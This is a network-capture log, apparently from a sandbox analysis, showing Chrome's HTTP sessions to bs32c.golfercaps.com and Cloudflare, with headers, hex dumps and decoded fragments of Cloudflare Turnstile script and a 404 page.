                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 6e 4f 53 38 32 4e 76 44 79 36 6b 66 57 37 65 37 76 38 50 48 79 38 2f 54 31 39 76 66 34 2b 66 72 37 2f 50 33 2b 41 41 46 5a 54 46 4a 4a 56 56 34 57 51 6a 4a 69 58 79 4d 57 47 43 76 36 45 68 4d 55 46 52 59 58 47 42 6b 61 47 78 77 64 48 68 38 67 49 58 38 76 4a 44 59 32 4e 7a 67 79 52 52 55 73 4c 53 34 76 4d 44 45 79 4d 7a 51 31 4e 6a 65 56 66 6f 61 4f 67 5a 67 6f 50 30 42 42 51 6b 4e 45 52 55 5a 48 53 45 6c 4b 53 30 78 4e 54 70 4b 59 6c 4b 61 72 6a 31 78 39 65 6f 69 79 63 47 4b 5a 58 58 74 66 64 48 78 4d 59 32 52 6c 5a 6d 64 6f 61 57 70 72 62 47 31 75 62 33 42 78 63 72 61 38 75 4d 72 50 73 34 43 37 6e 73 43 74 6b 6f 61 39 69 59 74 74 68 49 57 47 68 34 69 4a 69 6f 75 4d 6a 59 36 50 37 58 75 53 6b 35 53 56 6c 70 65 59 6d 66 65 62 34 65 6e 78 35 4b 44 38 6a 4b
                                                                  Data Ascii: nOS82NvDy6kfW7e7v8PHy8/T19vf4+fr7/P3+AAFZTFJJVV4WQjJiXyMWGCv6EhMUFRYXGBkaGxwdHh8gIX8vJDY2NzgyRRUsLS4vMDEyMzQ1NjeVfoaOgZgoP0BBQkNERUZHSElKS0xNTpKYlKarj1x9eoiycGKZXXtfdHxMY2RlZmdoaWprbG1ub3Bxcra8uMrPs4C7nsCtkoa9iYtthIWGh4iJiouMjY6P7XuSk5SVlpeYmfeb4enx5KD8jK
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 36 75 76 73 37 53 34 7a 4e 7a 45 32 50 45 45 31 4f 6b 78 52 43 44 41 67 54 52 38 69 45 67 45 66 41 77 59 32 48 44 52 50 53 31 70 51 49 30 51 33 50 30 46 4c 51 44 64 46 57 79 70 49 52 57 68 7a 4c 32 68 65 4e 44 4a 75 4f 54 52 77 57 46 78 37 59 44 73 38 51 6a 68 30 63 58 4a 6f 4d 6b 77 63 4d 7a 51 31 4e 6e 5a 37 66 33 6c 2b 68 49 6c 39 67 70 53 5a 55 47 39 77 66 4a 56 62 53 47 5a 4b 54 56 78 50 61 54 6c 51 55 56 4a 54 6b 35 69 63 6c 70 75 68 70 70 71 66 73 62 5a 74 6f 71 75 6d 6c 61 78 36 5a 6f 52 6f 61 37 36 53 65 63 53 51 78 70 4b 59 76 63 76 4c 72 4d 32 51 79 33 75 56 5a 58 78 39 66 6e 2b 2f 78 4d 6a 43 78 38 33 53 78 73 76 64 34 70 6e 53 76 62 7a 4a 34 36 61 53 73 4a 54 73 33 2b 58 63 36 50 47 70 32 2b 44 6b 33 75 50 70 37 75 4c 7a 39 66 71 31 36 2f 48
                                                                  Data Ascii: 6uvs7S4zNzE2PEE1OkxRCDAgTR8iEgEfAwY2HDRPS1pQI0Q3P0FLQDdFWypIRWhzL2heNDJuOTRwWFx7YDs8Qjh0cXJoMkwcMzQ1NnZ7f3l+hIl9gpSZUG9wfJVbSGZKTVxPaTlQUVJTk5iclpuhppqfsbZtoqumlax6ZoRoa76SecSQxpKYvcvLrM2Qy3uVZXx9fn+/xMjCx83Sxsvd4pnSvbzJ46aSsJTs3+Xc6PGp2+Dk3uPp7uLz9fq16/H
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 6b 41 55 54 52 73 72 54 79 6c 53 51 56 4e 43 4b 54 30 79 49 7a 4e 48 54 69 31 51 50 68 78 51 4f 52 45 58 44 45 78 52 56 55 39 55 57 6c 39 54 57 47 70 76 49 54 51 45 47 78 77 64 48 6e 77 4b 49 53 49 6a 4a 48 64 72 65 33 31 37 65 45 59 57 63 47 2b 43 64 54 68 68 62 47 52 37 6b 45 6b 2f 55 79 51 37 50 44 30 2b 52 34 61 57 6b 49 61 59 6a 70 57 56 55 46 4a 4b 70 6a 59 33 4f 45 39 51 55 56 4a 54 56 46 56 57 72 5a 6d 72 57 70 36 6b 71 61 47 7a 75 47 46 2f 59 36 4f 6f 72 4b 61 72 73 62 61 71 72 38 48 47 71 71 2b 30 75 4c 4b 33 76 63 4b 32 75 38 33 53 69 63 72 4d 79 4e 47 52 76 70 31 74 68 49 57 47 68 34 69 4a 69 6f 76 69 7a 75 43 50 77 64 37 64 36 63 79 74 6c 72 53 59 33 2b 2f 70 33 2f 48 6e 37 75 36 70 71 36 4d 41 6a 35 43 6e 71 4b 6d 71 71 36 79 74 72 71 2b 77
                                                                  Data Ascii: kAUTRsrTylSQVNCKT0yIzNHTi1QPhxQOREXDExRVU9UWl9TWGpvITQEGxwdHnwKISIjJHdre317eEYWcG+CdThhbGR7kEk/UyQ7PD0+R4aWkIaYjpWVUFJKpjY3OE9QUVJTVFVWrZmrWp6kqaGzuGF/Y6OorKarsbaqr8HGqq+0uLK3vcK2u83SicrMyNGRvp1thIWGh4iJiovizuCPwd7d6cytlrSY3+/p3/Hn7u6pq6MAj5CnqKmqq6ytrq+w
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 68 49 53 68 34 50 52 52 49 33 52 69 49 5a 4b 56 46 51 48 46 38 79 55 6a 4d 64 47 6b 4a 50 52 46 39 72 50 43 55 38 61 44 63 72 53 6a 42 72 59 31 46 6a 4c 33 46 45 4f 47 35 79 65 56 70 4b 57 58 70 2b 66 54 6c 65 67 6b 46 53 63 6f 56 41 58 58 56 38 66 6b 57 45 6b 59 64 76 59 46 39 6c 6d 56 53 4c 6e 48 53 55 63 59 2b 57 64 49 69 58 6c 6c 36 42 67 5a 36 69 64 4b 4e 6f 61 48 6c 36 6e 36 4f 59 66 49 74 39 6b 33 5a 30 68 36 32 72 75 37 32 58 70 5a 50 41 6a 4a 53 4e 6e 73 47 45 78 6f 53 33 69 34 79 4e 74 71 4c 48 71 49 79 64 6e 39 57 72 7a 4a 61 2f 71 63 36 75 72 64 76 4b 73 4d 79 63 76 74 66 65 73 62 62 45 31 36 71 7a 79 4d 33 4d 7a 36 33 50 30 4b 76 56 73 63 48 51 78 50 43 34 79 50 48 4c 2b 74 75 37 32 51 47 37 31 50 6e 34 35 39 50 62 43 39 54 2b 31 74 6a 65 45
                                                                  Data Ascii: hISh4PRRI3RiIZKVFQHF8yUjMdGkJPRF9rPCU8aDcrSjBrY1FjL3FEOG5yeVpKWXp+fTlegkFScoVAXXV8fkWEkYdvYF9lmVSLnHSUcY+WdIiXll6BgZ6idKNoaHl6n6OYfIt9k3Z0h62ru72XpZPAjJSNnsGExoS3i4yNtqLHqIydn9WrzJa/qc6urdvKsMycvtfesbbE16qzyM3Mz63P0KvVscHQxPC4yPHL+tu72QG71Pn459PbC9T+1tjeE


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449747104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:17 UTC588OUTGET /turnstile/v0/b/787bc399e22f/api.js?onload=WXqDk4&render=explicit HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: script
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:18 UTC471INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:17 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 47692
                                                                  Connection: close
                                                                  accept-ranges: bytes
                                                                  last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                  access-control-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532ea5f4bc47a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:18 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                  Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                  Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                  Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                  Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                  Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                  Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449748188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:17 UTC877OUTGET /favicon.ico HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:18 UTC844INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:18 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnLzx1uhbs1zVfdO7YDiKziZZtKFuUEsDlTjiLGec7xFsY%2FHc9zvQGnFPaeDDqn%2FzIpqkr6XewFIbhWboTM%2Bbhc2aSaglkGZz9un0d24vtjxtE2K%2B%2B3DNkoZgdqWvWALGjpfIKANpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532eae886423b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1672&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1455&delivery_rate=1696687&cwnd=226&unsent_bytes=0&cid=dc15152b387e017b&ts=319&x=0"
                                                                  2024-12-30 21:42:18 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449750188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:18 UTC419OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421c HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:18 UTC882INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:18 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 97866
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KlhLJSWGUZUXQ05%2BCXqrGCmJULuPlA45xrvS5Y1R6tOoZwiO18XN8rKFC4Kqwrvutk7WOX%2BtWDArzl4WdyeMBBESAmvaN7V%2F1SpbIJN1NBWvsroaEb0eLNotC3NGebkovx%2Bc%2B4j8wA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
